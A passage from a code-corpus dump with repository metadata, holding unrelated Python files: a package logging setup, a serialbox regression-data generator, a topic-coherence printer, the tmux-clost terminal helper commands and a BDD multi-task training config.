            output += MARKDOWN_CELL_TEMPLATE % (HEADING_MARKERS[level] + rest_escaped)
            for _ in range(extra_code_cells):
                output += EMPTY_CODE_CELL
        # Non-list lines are intentionally ignored.
    return output
| 31.108696
| 86
| 0.486723
|
acff8a438c60bbb9228f999031ffb1b74d62b532
| 632
|
py
|
Python
|
skvalidate/__init__.py
|
FAST-HEP/scikit-validate
|
7c6de2dfa8c86bf2be6df2302f9a200902775604
|
[
"Apache-2.0"
] | 2
|
2019-06-12T17:05:47.000Z
|
2019-09-25T13:13:31.000Z
|
skvalidate/__init__.py
|
FAST-HEP/scikit-validate
|
7c6de2dfa8c86bf2be6df2302f9a200902775604
|
[
"Apache-2.0"
] | 23
|
2019-05-21T15:30:11.000Z
|
2021-07-08T19:48:06.000Z
|
skvalidate/__init__.py
|
FAST-HEP/scikit-validate
|
7c6de2dfa8c86bf2be6df2302f9a200902775604
|
[
"Apache-2.0"
] | 2
|
2019-05-21T15:32:21.000Z
|
2021-05-17T18:43:36.000Z
|
# -*- coding: utf-8 -*-
"""Top-level package for scikit-validate."""
import logging
import os

__author__ = """FAST"""
__email__ = 'fast-hep@cern.ch'
__version__ = '0.4.3'

# Directory containing this package on disk.
__skvalidate_root__ = os.path.dirname(__file__)

# Package logger: records everything down to DEBUG; what actually reaches
# the console is decided by the handler level below.  propagate=False keeps
# messages from being duplicated by the root logger.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.propagate = False

# Console handler -- verbose only when the SK_DEBUG env variable is set.
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG if os.environ.get("SK_DEBUG", False) else logging.INFO)

# Shared log-line layout: timestamp, logger name, level, message.
formatter = logging.Formatter(
    '%(asctime)s [%(name)s] %(levelname)s: %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
| 20.387097
| 57
| 0.713608
|
acff8add0e73df01acf5f14f35dc9b1446643467
| 3,254
|
py
|
Python
|
test/serialbox-python/sdb/regression/create_data.py
|
elsagermann/serialbox
|
c590561d0876f3ce9a07878e4862a46003a37879
|
[
"BSD-2-Clause"
] | 10
|
2017-04-18T14:28:07.000Z
|
2019-10-23T03:22:16.000Z
|
test/serialbox-python/sdb/regression/create_data.py
|
elsagermann/serialbox
|
c590561d0876f3ce9a07878e4862a46003a37879
|
[
"BSD-2-Clause"
] | 172
|
2017-02-16T14:24:33.000Z
|
2019-11-06T08:46:34.000Z
|
test/serialbox-python/sdb/regression/create_data.py
|
elsagermann/serialbox
|
c590561d0876f3ce9a07878e4862a46003a37879
|
[
"BSD-2-Clause"
] | 21
|
2016-12-15T15:22:02.000Z
|
2019-10-02T09:40:10.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
##
## S E R I A L B O X
##
## This file is distributed under terms of BSD license.
## See LICENSE.txt for more information.
##
##===------------------------------------------------------------------------------------------===##
import os
import sys
sys.path.insert(1, os.path.join(os.path.dirname(os.path.realpath(__file__)),
"../../../src/serialbox-python"))
import serialbox as ser
import numpy as np
from random import randint, random
class StencilUVWT(object):
    """Generates and serializes synthetic u/v/w/t/tp fields over two stages.

    With ``num_errors > 0`` random point perturbations are written into
    ``w`` during stage 2, producing an '-error' dataset for regression tests.
    """

    def __init__(self, num_errors=0, is_error=None):
        """Create the serializer directory and seeded random input fields.

        :param num_errors: number of random perturbations injected per stage-2 call
        :param is_error: if truthy while num_errors == 0, still use an '-error' dir
        """
        self.name = "StencilUVWT"
        self.invocation_count = 0
        self.num_errors = num_errors
        # BUG FIX: was ``num_errors is 0`` -- identity comparison with an int
        # literal only works by CPython small-int interning; use ``==``.
        # (Also renamed the local so it no longer shadows builtin ``dir``.)
        directory = "./" + self.name + ("" if num_errors == 0 else "-error")
        if num_errors == 0 and is_error:
            directory += "-error"
        self.serializer = ser.Serializer(ser.OpenModeKind.Write, directory, "stencil")
        self.serializer.global_metainfo.insert("stencils", ["StencilUVWT"])
        # Fixed seed keeps the generated reference data reproducible.
        np.random.seed(0)
        self.u = np.random.rand(32, 34, 80)
        self.v = np.random.rand(32, 34, 80)
        self.w = np.random.rand(32, 34, 80)
        self.t = np.random.rand(80)
        self.tp = np.random.rand(32, 34)

    def run(self, num=1):
        """Execute ``num`` full iterations (stage_1 then stage_2)."""
        for _ in range(num):
            self.stage_1()
            self.stage_2()
            self.invocation_count += 1

    def stage_1(self):
        """First stage: shift u/v/w/tp by constants, serializing in/out states."""
        self.serialize("in", 0, "stage_1", {"u": self.u, "v": self.v, "w": self.w, "tp": self.tp})
        self.u += 1
        self.v += 2
        self.w += 3
        self.tp += 4
        self.serialize("out", 0, "stage_1", {"u": self.u, "v": self.v, "w": self.w, "tp": self.tp})

    def stage_2(self):
        """Second stage: shift all fields, then inject ``num_errors`` random
        single-point perturbations into ``w`` (to trigger comparison failures).
        """
        self.serialize("in", 1, "stage_2", {"u": self.u, "v": self.v, "w": self.w, "t": self.t, "tp": self.tp})
        self.u += 1
        self.v += 2
        self.w += 3
        self.t += 4
        self.tp += 5
        for _ in range(self.num_errors):
            self.w[randint(0, self.w.shape[0] - 1),
                   randint(0, self.w.shape[1] - 1),
                   randint(0, self.w.shape[2] - 1)] = random()
        self.serialize("out", 1, "stage_2", {"u": self.u, "v": self.v, "w": self.w, "t": self.t, "tp": self.tp})

    def serialize(self, intent, stage_id, stage_name, fields):
        """Write ``fields`` at a savepoint tagged with stage and invocation info."""
        sp = ser.Savepoint(self.name + "__" + intent)
        sp.metainfo.insert("stage_id", stage_id)
        sp.metainfo.insert("stage_name", stage_name)
        sp.metainfo.insert("invocation_count", self.invocation_count)
        for name, field in fields.items():
            self.serializer.write(name, sp, field)
if __name__ == '__main__':
#ser.Logging().enable()
s_uvwt = StencilUVWT()
s_uvwt.run(2)
s_uvwt_error = StencilUVWT(42000, True)
s_uvwt_error.run(2)
| 30.12963
| 112
| 0.503688
|
acff8b155e7f0e280f50878172703ea1bb8e0f61
| 977
|
py
|
Python
|
PrintResults.py
|
jhlau/topic-coherence-sensitivity
|
fb33fc72da83bee400b112a54317d9fd2fb66afe
|
[
"MIT"
] | 24
|
2016-04-08T14:32:42.000Z
|
2021-11-25T20:06:08.000Z
|
PrintResults.py
|
jhlau/topic-coherence-sensitivity
|
fb33fc72da83bee400b112a54317d9fd2fb66afe
|
[
"MIT"
] | 3
|
2019-09-07T15:49:14.000Z
|
2019-09-19T04:27:21.000Z
|
PrintResults.py
|
jhlau/topic-coherence-sensitivity
|
fb33fc72da83bee400b112a54317d9fd2fb66afe
|
[
"MIT"
] | 3
|
2019-08-16T02:26:42.000Z
|
2019-11-13T19:41:31.000Z
|
"""
Stdin: N/A
Stdout: N/A
Author: Jey Han Lau
Date: Mar 15
"""
import argparse
import sys
import cPickle
import codecs
#parser arguments
desc = "Print topic coherence results"
parser = argparse.ArgumentParser(description=desc)
#####################
#positional argument#
#####################
parser.add_argument("coherence_pickle", help="pickle file generated by run-npmi/wi.sh")
parser.add_argument("topic_file", help="text file containing the topic words")
###################
#optional argument#
###################
args = parser.parse_args()
#parameters
###########
#functions#
###########
######
#main#
######
data = cPickle.load(open(args.coherence_pickle))
topics = [ item.strip() for item in codecs.open(args.topic_file).readlines() ]
for t in sorted(data.keys()):
print "="*30
print "Topic =", topics[t]
for ci, c in enumerate(range(5, 21, 5)):
print "\tTop", c, "coherence score =", data[t][1][ci]
| 19.938776
| 87
| 0.596725
|
acff8b2450ee6b7486850d1bbd5b7645d03f6a63
| 15,969
|
py
|
Python
|
lib/command.py
|
sergei-dyshel/tmux-clost
|
699723565cfecc2ef2d6ededb258d57d467792f4
|
[
"MIT"
] | null | null | null |
lib/command.py
|
sergei-dyshel/tmux-clost
|
699723565cfecc2ef2d6ededb258d57d467792f4
|
[
"MIT"
] | null | null | null |
lib/command.py
|
sergei-dyshel/tmux-clost
|
699723565cfecc2ef2d6ededb258d57d467792f4
|
[
"MIT"
] | null | null | null |
import os.path
import re
import inspect
import sys
import json
import argparse
import shlex
import pipes
from .environment import env
from .config import config
from . import (alias, tmux, log, history, common, utils, output,
clipboard, context, split, snippet)
class Command(object):
    """Base class for all clost commands.

    Subclasses implement :meth:`run`; class attributes control whether a
    terminal context is required and how CLI arguments are declared.
    """

    # True if the command needs a detected terminal context to run.
    requires_context = True
    # True to silently ignore (instead of raise on) a missing context.
    silent_no_context = False
    server_side = True
    # Optional/positional CLI argument definitions: (name, type, help) triples.
    opt_arg_defs = []
    pos_arg_defs = []

    def init(self, ctx, args):
        """Bind the command to *ctx* and parsed CLI *args* and build its
        effective option set (global -> per-command -> per-context-command).
        """
        self.ctx = ctx
        self.args = args
        # BUG FIX: was ``self.options = config.options`` -- the update()
        # calls below then mutated the global configuration in place.
        self.options = dict(config.options)
        self.options.update(config.commands.get(self.name(), {}))
        if ctx:
            self.options.update(ctx.commands.get(self.name(), {}))

    def run(self):
        """Execute the command; subclasses must override."""
        raise NotImplementedError

    def get_option(self, opt_name):
        """Resolve *opt_name*: CLI args first, then the merged options,
        then the context's options, finally the global options.

        BUG FIX: the context/global fallbacks were unreachable dead code
        because the first handler returned (or raised KeyError) directly.
        """
        try:
            return self.args[opt_name]
        except KeyError:
            pass
        try:
            return self.options[opt_name]
        except KeyError:
            pass
        try:
            return self.ctx.options[opt_name]
        except KeyError:
            return config.options[opt_name]

    @classmethod
    def name(cls):
        """Command name; defaults to the class name."""
        return cls.__name__

    @classmethod
    def add_subparser(cls, subparsers):
        """Register this command's argparse subparser.

        ``bool`` options become paired ``--x`` / ``--no-x`` flags; all other
        optional args become typed ``--x`` options.
        """
        subparser = subparsers.add_parser(utils.dashes(cls.name()))
        subparser.set_defaults(cmd_class=cls)
        for arg_name, arg_type, arg_help in cls.opt_arg_defs:
            name_dashes = utils.dashes(arg_name)
            if arg_type == bool:
                subparser.add_argument('--' + name_dashes, dest=arg_name,
                                       action='store_true', help=arg_help)
                no_help = 'Do not ' + arg_help[0].lower() + arg_help[1:]
                subparser.add_argument('--no-' + name_dashes, dest=arg_name,
                                       action='store_false', help=no_help)
            else:
                subparser.add_argument('--' + name_dashes,
                                       dest=arg_name, type=arg_type, help=arg_help)
        for arg_name, arg_type, arg_help in cls.pos_arg_defs:
            # (removed an unused ``name_dashes`` computation here)
            subparser.add_argument(arg_name, type=arg_type, help=arg_help)

    def strip_suggestion(self):
        """Strip a shell auto-suggestion from the captured command line.

        The trailing visible token of the escaped pane line counts as a
        suggestion when it is preceded by one of the configured
        ``suggestion_color_escape_code`` values; if so it is removed from
        ``self.ctx.cmd_line``.
        """
        escape_code_list = utils.single_to_list(
            self.get_option('suggestion_color_escape_code'))
        if not escape_code_list:
            return
        _, splits = context.capture_escaped_line()
        # Drop trailing escape codes to expose the last visible token.
        while splits:
            last = splits[-1]
            if context.is_escape_code(last):
                del splits[-1]
                continue
            break
        log.info('Splitted cmd with escape codes: {}', splits)
        if not splits:
            return
        suggestion = splits[-1]
        del splits[-1]
        # Was that token rendered in the suggestion color?
        has_suggestion_escape = False
        while splits:
            last = splits[-1]
            if not context.is_escape_code(last):
                break
            if last in escape_code_list:
                has_suggestion_escape = True
                break
            del splits[-1]
        if not has_suggestion_escape:
            return
        log.debug('Suggestion: {}', suggestion)
        if self.ctx.cmd_line.endswith(suggestion):
            self.ctx.cmd_line = self.ctx.cmd_line[0:-len(suggestion)]
        else:
            log.error('Error stripping suggestion')
class press_enter(Command):
    """Intercepted Enter key: expand aliases on the current command line,
    submit it, and append it to the per-context history file.
    """
    silent_no_context = True
    def run(self):
        # No context or empty line: just forward the keypress.
        if self.ctx is None or not self.ctx.cmd_line:
            tmux.send_keys(['Enter'])
            log.info('Skipping empty command line')
            return
        # On any error still press Enter so the user's keystroke isn't lost.
        with common.handle_exceptions(lambda: tmux.send_keys(['Enter'])):
            cmd = self.ctx.cmd_line
            newcmd = alias.expand(cmd, self.ctx.cfg)
            if newcmd.strip() != cmd.strip():
                # Alias changed the line: rewrite it before submitting.
                cmd = newcmd
                tmux.replace_cmd_line(
                    cmd, bracketed=self.get_option('bracketed_paste'))
            tmux.send_keys(['Enter'])
        # Best-effort: history failures must not break command submission.
        with common.handle_exceptions():
            log.info('Saving command "{}"', cmd)
            history.save_to_history(self.ctx.name, cmd)
class expand_alias(Command):
    """Replace the current command line with its alias expansion."""

    def run(self):
        original = self.ctx.cmd_line
        expanded = alias.expand(original, self.ctx.cfg)
        if expanded == original:
            # Nothing expanded -- report it instead of rewriting the line.
            raise common.ClostError('No alias found')
        tmux.replace_cmd_line(
            expanded, bracketed=self.get_option('bracketed_paste'))
class escape_codes(Command):
    """Debugging helper: print the raw escaped pane line and its tokens."""
    requires_context = False
    def run(self):
        # NOTE: Python 2 print statements -- this module targets Python 2.
        line, splits = context.capture_escaped_line()
        print 'Full line:', repr(line)
        print 'Splitted:\n', '\n'.join(repr(s) for s in splits)
class search_history(Command):
    """Pick a past command from the per-context history (optionally filtered
    by the current command line) and put it on the command line.
    """
    def run(self):
        # NOTE(review): 'cut -f2-' assumes the first whitespace-separated
        # field of each history line is metadata -- confirm in history module.
        cmd = 'cat {} | cut -d" " -f2- '.format(
            history.get_history_path(self.ctx.name))
        cmd_line = self.ctx.cmd_line
        if cmd_line:
            # Use the current (partial) command line as a fixed-string filter.
            escaped = cmd_line.replace('"', r'\"')
            cmd = cmd + '| grep -F -- "{}"'.format(escaped)
        line = split.select_split_pipe(cmd, self.get_option('selector'))
        if line:
            tmux.replace_cmd_line(
                line, bracketed=self.get_option('bracketed_paste'))
class copy_output(Command):
    """Copy the last command's output to the clipboard, optionally via a file."""
    def run(self):
        out = output.get(self.ctx.pattern, self.get_option('max_lines'))
        # NOTE(review): ``environment`` is not imported here (the module
        # imports ``env`` from .environment); this looks like it would raise
        # NameError at runtime -- confirm the intended name.
        output_file = environment.expand_path(self.get_option('output_file'))
        if output_file:
            log.info('Saving output to {}', output_file)
            with open(output_file, 'w') as f:
                f.write(out)
            clipboard.copy_file(output_file)
        else:
            clipboard.copy(out)
        num_lines = out.count('\n') + 1
        common.display_status('Captured {} lines (context: {})', num_lines,
                              self.ctx.name)
class last_output(Command):
    """Write the last command's output to stdout and report its size."""

    def run(self):
        captured = self.ctx.get_output()
        line_count = captured.count('\n') + 1
        sys.stdout.write(captured)
        common.display_status('Captured {} lines (context: {})', line_count,
                              self.ctx.name)
class path_picker(Command):
    """Run fpp (PathPicker) over the last output in a split window and paste
    the picked paths back into the pane.
    """
    def run(self):
        out = output.get(self.ctx.pattern, self.get_option('max_lines'))
        # NOTE(review): ``environment`` is not imported (module imports
        # ``env``); these calls look like NameErrors -- confirm.
        save_path = environment.temp_file('output.txt')
        with open(save_path, 'w') as f:
            f.write(out)
        # NOTE(review): pane_id is computed but never used.
        pane_id = tmux.get_variable('pane_id')
        helper = os.path.join(environment.get_var('main_dir'), 'scripts', 'fpp_helper.sh')
        # HACK: hard-coded user-specific fpp install path.
        res = utils.run_in_split_window('cat {} | /home/sergei/opt/fpp/fpp -nfc -ai -ni -c {}'.format(
            save_path, helper))
        if res == 0:
            # fpp_helper stores the selection in the 'clost_fpp' buffer.
            tmux.run(['paste-buffer', '-p', '-b', 'clost_fpp'])
class insert_snippet(Command):
    """Let the user pick a snippet for the current context and insert it."""
    def run(self):
        snippets_dir = env.vars['snippets_dir']
        ctx_snippets_dir = os.path.join(snippets_dir, self.ctx.name)
        if not os.path.isdir(ctx_snippets_dir):
            # No snippets defined for this context.
            return
        snippet_names = os.listdir(ctx_snippets_dir)
        snippet_name = split.select_split(snippet_names,
                                          self.get_option('selector'))
        if not snippet_name:
            # Selection cancelled by the user.
            return
        snippet.insert_snippet(snippets_dir, self.ctx.name, snippet_name,
                               self.get_option('bracketed_paste'))
        # with open(os.path.join(ctx_snippets_dir, snippet_name), 'rb+') as f:
        #     tmux.insert_text(
        #         f.read()[:-1], bracketed=self.get_option('bracketed_paste'))
class edit_cmd(Command):
    """Open the current command line in an external editor and put the edited
    result back.  Subclasses may transform the text via preprocess/postprocess.
    """
    def preprocess(self, text):
        # Hook: transform the command line before it is written for editing.
        return text
    def postprocess(self, text):
        # Hook: transform the edited text before restoring it to the pane.
        return text
    def run(self):
        cmd_file = env.temp_file_path('cmd.txt')
        with open(cmd_file, 'w') as f:
            f.write(self.preprocess(self.ctx.cmd_line))
        # editor = common.get_config()['editor']
        # editor = environment.expand_path(config.get_option('editor'))
        editor = self.get_option('editor')
        res = split.run_in_split_window(
            '{} {}'.format(editor, cmd_file), capture_output=False)
        if res != 0:
            # Non-zero editor exit status is treated as cancellation.
            log.info(
                'Editing command line was cancelled (editor exited with status {})',
                res)
            return
        with open(cmd_file) as f:
            new_cmd = self.postprocess(f.read().strip())
        if new_cmd == self.ctx.cmd_line:
            log.info('Command line not changed during editing')
        else:
            tmux.replace_cmd_line(
                new_cmd, bracketed=self.get_option('bracketed_paste'))
class splitlines_edit_cmd(edit_cmd):
    """Edit the command line with one shell token per editor line."""

    def preprocess(self, text):
        # Split into shell tokens so the editor shows one per line.
        tokens = shlex.split(text)
        return '\n'.join(tokens)

    def postprocess(self, text):
        # Re-quote each edited line and join back into a single command.
        return ' '.join(pipes.quote(token) for token in text.splitlines())
class show_context(Command):
    """Print the detected context name, prompt pattern and command line."""
    def run(self):
        # ``**locals()`` supplies ``self`` for the {self.ctx...} fields.
        sys.stdout.write('''tmux-clost current context:
CONTEXT: {self.ctx.name}
PATTERN: {self.ctx.pattern}
CMD: {self.ctx.cmd_line}
'''.format(**locals()))
class prev_prompt(Command):
    """Scroll the pane (in copy mode) up to the previous shell prompt."""
    def run(self):
        tmux.run(['copy-mode'])
        hist_size = int(tmux.get_variable('history_size'))
        pos = int(tmux.get_variable('scroll_position')) + 1
        # Search backwards through the scrollback in 1000-line windows.
        while pos < hist_size:
            new_pos = min(pos + 1000, hist_size)
            lines = tmux.capture_pane(start=-new_pos, end=-pos, dump=True)
            try:
                # Last prompt in this window is the nearest one above us.
                offset = list(context.finditer_prompts(
                    lines, self.ctx.pattern))[-1].start
            except IndexError:
                # No prompt in this window; move further back.
                pos = new_pos + 1
                continue
            lineno = lines.count('\n', 0, offset)
            tmux.run(['send-keys', '-X', 'goto-line', new_pos - lineno])
            return
        raise common.ClostError('No previous prompt')
class next_prompt(Command):
    """Scroll the pane (in copy mode) down to the next shell prompt."""
    def run(self):
        tmux.run(['copy-mode'])
        scroll_pos = int(tmux.get_variable('scroll_position'))
        if scroll_pos == 0:
            # Position 0 means the pane is already at the live bottom.
            raise common.ClostError('Already at bottom of history')
        pos = scroll_pos - 1
        lines = tmux.capture_pane(start=-pos, dump=True)
        try:
            # First prompt below the current scroll position.
            offset = next(context.finditer_prompts(lines,
                                                   self.ctx.pattern)).start
        except StopIteration:
            raise common.ClostError('No next prompt')
        lineno = lines.count('\n', 0, offset)
        new_pos = max(pos - lineno, 0)
        tmux.run(['send-keys', '-X', 'goto-line', new_pos])
class cmd_line(Command):
    """Print the current command line (also works while in copy mode)."""
    def run(self):
        if not tmux.pane_in_mode():
            res = self.ctx.cmd_line
        else:
            # In copy mode: find the first prompt below the scroll position
            # and take the text after it up to end of line.
            scroll_pos = int(tmux.get_variable('scroll_position'))
            lines = tmux.capture_lines(start=-scroll_pos)
            iter_ = context.finditer_prompts(lines, self.ctx.pattern)
            try:
                prompt = next(iter_)
                cl_end = lines.find('\n', prompt.end)
                res = lines[prompt.end:cl_end].lstrip()
            except StopIteration:
                raise common.ClostError('No command line found below')
        log.debug('Captured command line: {}', res)
        sys.stdout.write(res)
class sleep(Command):
    """Debug command: block for a fixed 10 seconds."""
    def run(self):
        import time
        time.sleep(10)
class wait_for_prompt(Command):
    """Toggle 'run a command when the pane next reaches a prompt'.

    Without --window-id: arm (or, if already armed, disarm) tmux silence
    monitoring for the current window.  With --window-id: invoked from the
    alert-silence hook to check whether the armed pane now shows a prompt.
    """
    requires_context = False
    opt_arg_defs = [('window_id', str,
                     'ID of window on which silence occured')]
    def run(self):
        if self.args['window_id']:
            # Called back from the tmux alert-silence hook.
            return self._check_prompt()
        if tmux.get_option(
                'wait_for_prompt_pane', clost=True, window=True):
            log.info('Already waiting for prompt, disabling...')
            return self._disable_waiting()
        # Arm: remember the pane and turn on tmux silence monitoring.
        tmux.set_option(
            'wait_for_prompt_pane',
            tmux.get_variable('pane_id'),
            clost=True,
            window=True)
        tmux.set_option(
            'monitor-silence',
            self.get_option('monitor_interval'),
            window=True)
        tmux.set_option('visual-silence', 'off', window=True)
        tmux.set_option('silence-action', 'any', window=True)
        tmux.set_hook('alert-silence',
                      'run-shell -b "#{@clost} wait-for-prompt --window-id #{hook_window}"')
    def _disable_waiting(self, target=None):
        # Disarm the silence monitor and forget the waiting pane.
        tmux.set_option('monitor-silence', 0, window=True, target=target)
        tmux.set_option('wait_for_prompt_pane', None,
                        clost=True, window=True, target=target)
    def _check_prompt(self):
        """Hook callback: if the armed pane shows a prompt, run the configured
        command and disarm; otherwise keep waiting.
        """
        win_id = self.args['window_id']
        pane_id = tmux.get_option(
            'wait_for_prompt_pane', clost=True, window=True, target=win_id)
        if not pane_id:
            log.warning('Not waiting for prompt in this window')
            return
        win_panes = tmux.list_panes(target=win_id)
        if pane_id not in win_panes:
            log.warning(
                'The pane waiting for prompt no longer belongs to this window (waiting pane {}, window panes {})',
                pane_id, win_panes)
        elif context.get_current(target=pane_id):
            log.info('Pane reached prompt')
            cmd = self.get_option('command')
            # NOTE(review): local ``env`` shadows the module-level env import.
            env = dict(
                TMUX_WINDOW=tmux.get_variable('window_name', pane=pane_id))
            utils.run_command(cmd, shell=True, env=env, pipe=True)
        else:
            # Not at a prompt yet -- leave monitoring armed.
            log.info('Prompt not detected, continuing waiting...')
            return
        self._disable_waiting(target=win_id)
class configure(Command):
    """One-time setup: rebind Enter so clost can intercept it (if enabled)."""
    requires_context = False
    def run(self):
        if config.options['intercept_enter']:
            tmux.bind_key('Enter', ['send-keys', 'Enter'])
            split.bind_enter()
class list_options(Command):
    """Print the effective option set as JSON -- globally, per context, per
    command, or for a command within a context.  (Python 2 print statements.)
    """
    requires_context = False
    opt_arg_defs = [('command', str, 'TODO'), ('context', str, 'TODO')]
    def run(self):
        ctx_name = self.args['context']
        cmd_name = self.args['command']
        ctx = None
        if ctx_name is not None:
            try:
                ctx = context.Context(cfg=config.contexts_by_name[ctx_name])
            except KeyError:
                raise Exception('Invalid context {}'.format(ctx_name))
        cmd = None
        if cmd_name is not None:
            try:
                cmd_class = _list_commands()[cmd_name]
            except KeyError:
                raise common.ClostError('Invalid command {}'.format(cmd_name))
            # Instantiate with empty args so init() builds the merged options.
            cmd = cmd_class()
            cmd.init(ctx, {})
        if ctx is not None and cmd is not None:
            options = cmd.options
            print "Context '{}' options for command '{}':".format(
                ctx_name, cmd_name)
        elif ctx is not None:
            options = ctx.options
            print "Context '{}' options:".format(ctx_name)
        elif cmd is not None:
            options = cmd.options
            print "Command '{}' options:".format(cmd_name)
        else:
            options = config.options
            print "Global options:"
        json.dump(options, sys.stdout, indent=4)
        print
def _list_commands():
    # Map command name -> class for every Command subclass defined in this
    # module.  (Python 2: dict.itervalues.)
    return {x.name(): x for x in globals().itervalues()
            if inspect.isclass(x) and issubclass(x, Command) and x != Command}
def populate_subparsers(subparsers):
    """Register an argparse subparser for every known command."""
    for cmd_class in _list_commands().values():
        cmd_class.add_subparser(subparsers)
def parse_command(args=None, modify=None, server_side=False):
    """Build the full clost argument parser and parse ``args``.

    ``modify`` may add top-level arguments before the command subparsers
    (it also enables --help).
    NOTE(review): ``server_side`` is accepted but unused here.
    """
    parser = argparse.ArgumentParser(add_help=(modify is not None))
    if modify:
        modify(parser)
    subparsers = parser.add_subparsers()
    populate_subparsers(subparsers)
    return parser.parse_args(args=args)
#TODO: not used
def handle_command(cmd_args):
    """Instantiate and run the command class parsed into ``cmd_args``."""
    ctx = None
    if cmd_args.cmd_class.requires_context:
        ctx = context.get_current()
        if ctx is None:
            if not cmd_args.cmd_class.silent_no_context:
                raise common.ClostError('Could not detect context')
    cmd = cmd_args.cmd_class()
    cmd.init(ctx, vars(cmd_args))
    if ctx:
        # Remove any shell auto-suggestion from the captured command line.
        cmd.strip_suggestion()
    cmd.run()
| 34.415948
| 118
| 0.580124
|
acff8b8911d548c627355d2c60ecc17fb876f35c
| 1,949
|
py
|
Python
|
libs/configs/DOTA2.0/r2cnn/cfgs_res50_dota2.0_r2cnn_v1.py
|
Artcs1/RotationDetection
|
095be17345ee9984d8de8f24eb6b5a0b2d764a06
|
[
"Apache-2.0"
] | 850
|
2020-10-27T08:51:54.000Z
|
2022-03-30T15:12:06.000Z
|
libs/configs/DOTA2.0/r2cnn/cfgs_res50_dota2.0_r2cnn_v1.py
|
Artcs1/RotationDetection
|
095be17345ee9984d8de8f24eb6b5a0b2d764a06
|
[
"Apache-2.0"
] | 94
|
2020-12-01T02:18:47.000Z
|
2022-03-30T08:14:27.000Z
|
libs/configs/DOTA2.0/r2cnn/cfgs_res50_dota2.0_r2cnn_v1.py
|
Artcs1/RotationDetection
|
095be17345ee9984d8de8f24eb6b5a0b2d764a06
|
[
"Apache-2.0"
] | 149
|
2020-10-29T03:30:32.000Z
|
2022-03-29T09:53:23.000Z
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
from libs.configs._base_.models.faster_rcnn_r50_fpn import *
from libs.configs._base_.datasets.dota_detection import *
from libs.configs._base_.schedules.schedule_1x import *
from dataloader.pretrained_weights.pretrain_zoo import PretrainModelZoo
# schedule
BATCH_SIZE = 1
GPU_GROUP = "0,1,2,3"
NUM_GPU = len(GPU_GROUP.strip().split(','))
# Linear LR scaling with total batch size across GPUs.
LR = 0.001 * BATCH_SIZE * NUM_GPU
# Checkpoint interval (iterations); also the unit for decay steps below.
SAVE_WEIGHTS_INTE = 40000
# DECAY_EPOCH / MAX_EPOCH / WARM_EPOCH come from the schedule_1x base config.
DECAY_STEP = np.array(DECAY_EPOCH, np.int32) * SAVE_WEIGHTS_INTE
MAX_ITERATION = SAVE_WEIGHTS_INTE * MAX_EPOCH
# NOTE(review): 'WARM_SETP' looks like a typo of WARM_STEP, but the name may
# be consumed elsewhere -- keep as is.
WARM_SETP = int(WARM_EPOCH * SAVE_WEIGHTS_INTE)
# dataset
DATASET_NAME = 'DOTA2.0'
CLASS_NUM = 18
# model
# backbone
pretrain_zoo = PretrainModelZoo()
PRETRAINED_CKPT = pretrain_zoo.pretrain_weight_path(NET_NAME, ROOT_PATH)
TRAINED_CKPT = os.path.join(ROOT_PATH, 'output/trained_weights')
VERSION = 'FPN_Res50D_DOTA2.0_1x_20210419'
"""
R2CNN
FLOPs: 1238358557; Trainable params: 41791132
This is your evaluation result for task 1:
mAP: 0.5234759167701059
ap of each class:
plane:0.7980263807994686,
baseball-diamond:0.5040420743072365,
bridge:0.4054416907024359,
ground-track-field:0.6211356797664414,
small-vehicle:0.585125118187571,
large-vehicle:0.5215541280742031,
ship:0.666279086558348,
tennis-court:0.7773580788348857,
basketball-court:0.5859180577370384,
storage-tank:0.7340726762524007,
soccer-ball-field:0.42389526398486815,
roundabout:0.5512795363468848,
harbor:0.44366789061959877,
swimming-pool:0.5732843312238601,
helicopter:0.5230771307504916,
container-crane:0.16472019343420496,
airport:0.39625862292530317,
helipad:0.14743056135666283
The submitted information is :
Description: FPN_Res50D_DOTA2.0_1x_20210419_68w
Username: sjtu-deter
Institute: SJTU
Emailadress: yangxue-2019-sjtu@sjtu.edu.cn
TeamMembers: yangxue
"""
| 28.661765
| 72
| 0.779887
|
acff8bf0444949898df7046de7e8b5c72f7b3230
| 1,169
|
py
|
Python
|
bdd_mtl/configs/mtl/bdd_dla34up_d_non-city30k.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | null | null | null |
bdd_mtl/configs/mtl/bdd_dla34up_d_non-city30k.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | null | null | null |
bdd_mtl/configs/mtl/bdd_dla34up_d_non-city30k.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | null | null | null |
from bdd_mtl_factory import get_configs
import sys
################################################################################
#
# Format of the command to get configs:
#
# $MODEL_NAME-$TASKS
#
# task correspondence:
# l - Lane marking
# r - Drivable area
# s - Semantic segmentation
# d - Detection
# i - Instance Segmentation
# t - Multiple object Tracking
# x - Multiple object Tracking with Segmentation
#
################################################################################
cfg = get_configs('dla34up-d')
# Override default configs. Feel free to override more fields
cfg.optimizer['lr'] = 0.02
cfg.lr_config['step'] = [16, 22]
cfg.total_epochs = 24
cfg.data['imgs_per_gpu'] = 4
cfg.data['workers_per_gpu'] = 4
cfg.work_dir = './work_dirs/debug/BDD-d_non-city-30k/dla34up'
cfg.load_from = None
cfg.resume_from = None
# Swap in the 30k non-city training subset; strip '.json' ([:-5]) and append
# the subset suffix.  NOTE(review): the test annotation path is derived from
# the *val* entry -- looks intentional (test on val split) but confirm.
cfg.data['train'][0]['ann_file'] = cfg.data['train'][0]['ann_file'][:-5] + '_non-city_30k.json'
cfg.data['test'][0]['ann_file'] = cfg.data['val'][0]['ann_file'][:-5] + '_non-city.json'
# Export every cfg attribute as a module-level name so the framework can read
# this file as a flat config module.
for k, v in cfg.__dict__.items():
    if not k.startswith('__'):
        setattr(sys.modules[__name__], k, v)
| 30.763158
| 95
| 0.578272
|
acff8d94c64eea3ed7f2f8e2a83808db761638c1
| 298
|
py
|
Python
|
CTFShow/pwn02.py
|
Don2025/CTFwriteUp
|
41e0a5bf87a1a02dd1548e621853c145ff64cedb
|
[
"MIT"
